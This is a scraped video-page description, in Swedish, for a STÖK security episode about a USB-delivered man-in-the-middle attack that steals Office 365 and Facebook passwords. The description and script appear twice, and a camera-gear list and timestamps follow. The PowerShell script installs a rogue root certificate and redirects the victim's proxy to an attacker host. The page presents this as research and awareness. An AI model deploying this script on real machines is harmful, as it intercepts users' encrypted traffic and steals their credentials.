filmov
tv
STÖK - MITM SSL PROXY INCEPTION - Sno chefens Office 365 / Facebook lösenord på under 1 minut.
Показать описание
I det här avsnittet av STÖK kör vi ett enkelt powershell script via USB som installerar ett ful root CA cert och ställer samtidigt om offrets maskin så den surfar via vår proxy server i azure. Vi avkodar sedan SSL krypteringen via en BURP proxy och snor lösenord över HTTPS i klartext.
Attacken bygger på Microsofts egna programvaror, Kali Linux och Burp Proxy, eftersom användaren är lokal admin på järnet passerar attacken helt och hållet förbi samtliga skyddsmekanismer på under 1 sekund. Det vi gör är inget konstigt och är fully supported. Saken är den att detta är något som allt fler stora företag roar sig för att komma åt hackers/randsomware. De kan alltså läsa dina lösenord utan att du vet om det.
Offer datorn är max patchad och har både en tredjeparts Machine Learning antivirus/malware lösning aktiv samt ytterligare ett tredjepart system som skall blockera all okänd skadlig kod. 150.000 kronors brandväggen som trafiken går via kör både avancerade applikations blockeringar och utökade kontroller. nuff said..
Vi gör detta i forskningssyfte eftersom vi MÅSTE ifrågasätta de verktyg vi användare ibland blint förlitar oss på.. Som tex endpoint protection, patchade os och dyra brandväggar. Nothing is secure..
@echo off
echo. invoke powershellbypassmagic..
echo. done.
pause
$rootStore = Get-Item cert:\LocalMachine\Root
$rootStore.Open("ReadWrite")
$rootStore.Add($cert)
$rootStore.Close()
$reg = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Set-ItemProperty -Path $reg -Name ProxyServer -Value "your ip / hostname goes here"
Set-ItemProperty -Path $reg -Name ProxyEnable -Value 1
Fredrik Alexandersson
Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution.
Burp or Burp Suite is a graphical tool for testing Web application security.
------------ --- -
If you also want to get that STÖK vibe, here's my gear,
--CAMERA / STUDIO GEAR--
PANASONIC LUMIX GH5 4K
Nikon D850
DJI Osmo Pocket
Nikon AF-S FX NIKKOR 50mm f/1.4G
PANASONIC LUMIX 12-35mm Camera Lens G X VARIO II, F2.8
Rode VideoMicro Compact
Tascam DR-70D 4-Track Portable Audio Recorder
Blackmagic Design UltraStudio Mini Recorder - Thunderbolt
--COMPUTER--
Apple MacBook Pro
Dell Precision M5510 WorkStation
Dell U3419w Ultrasharp 34-Inch Curved
Logitech MX Master 2S Wireless Mouse
Apple Magic Keyboard with Numeric Keypad
Logitech HD Pro Webcam C920
QNAP TVS-672XT 6 Bay Thunderbolt 3 NAS
--STUDIO LIGHTS--
Philips Hue Smart Hub
Philips Hue Single Premium Smart Bulb, 16 million colors,
Philips Hue Smart Dimmer Switch with Remote
Softbox Lighting Kit
------------- --
STÖK LOVES:
Attacken bygger på Microsofts egna programvaror, Kali Linux och Burp Proxy, eftersom användaren är lokal admin på järnet passerar attacken helt och hållet förbi samtliga skyddsmekanismer på under 1 sekund. Det vi gör är inget konstigt och är fully supported. Saken är den att detta är något som allt fler stora företag roar sig för att komma åt hackers/randsomware. De kan alltså läsa dina lösenord utan att du vet om det.
Offer datorn är max patchad och har både en tredjeparts Machine Learning antivirus/malware lösning aktiv samt ytterligare ett tredjepart system som skall blockera all okänd skadlig kod. 150.000 kronors brandväggen som trafiken går via kör både avancerade applikations blockeringar och utökade kontroller. nuff said..
Vi gör detta i forskningssyfte eftersom vi MÅSTE ifrågasätta de verktyg vi användare ibland blint förlitar oss på.. Som tex endpoint protection, patchade os och dyra brandväggar. Nothing is secure..
@echo off
echo. invoke powershellbypassmagic..
echo. done.
pause
$rootStore = Get-Item cert:\LocalMachine\Root
$rootStore.Open("ReadWrite")
$rootStore.Add($cert)
$rootStore.Close()
$reg = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
Set-ItemProperty -Path $reg -Name ProxyServer -Value "your ip / hostname goes here"
Set-ItemProperty -Path $reg -Name ProxyEnable -Value 1
Fredrik Alexandersson
Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution.
Burp or Burp Suite is a graphical tool for testing Web application security.
------------ --- -
If you also want to get that STÖK vibe, here's my gear,
--CAMERA / STUDIO GEAR--
PANASONIC LUMIX GH5 4K
Nikon D850
DJI Osmo Pocket
Nikon AF-S FX NIKKOR 50mm f/1.4G
PANASONIC LUMIX 12-35mm Camera Lens G X VARIO II, F2.8
Rode VideoMicro Compact
Tascam DR-70D 4-Track Portable Audio Recorder
Blackmagic Design UltraStudio Mini Recorder - Thunderbolt
--COMPUTER--
Apple MacBook Pro
Dell Precision M5510 WorkStation
Dell U3419w Ultrasharp 34-Inch Curved
Logitech MX Master 2S Wireless Mouse
Apple Magic Keyboard with Numeric Keypad
Logitech HD Pro Webcam C920
QNAP TVS-672XT 6 Bay Thunderbolt 3 NAS
--STUDIO LIGHTS--
Philips Hue Smart Hub
Philips Hue Single Premium Smart Bulb, 16 million colors,
Philips Hue Smart Dimmer Switch with Remote
Softbox Lighting Kit
------------- --
STÖK LOVES:
0:06:00
0:04:42
0:06:24
1:17:04
0:02:29
0:14:06
0:00:53
0:58:15
0:20:49
0:51:09
0:08:25
0:18:20
0:24:51
0:15:51
0:05:56
0:15:38
0:59:16
0:31:09
0:08:46
0:26:57
0:42:44
0:46:56
0:20:14
0:18:03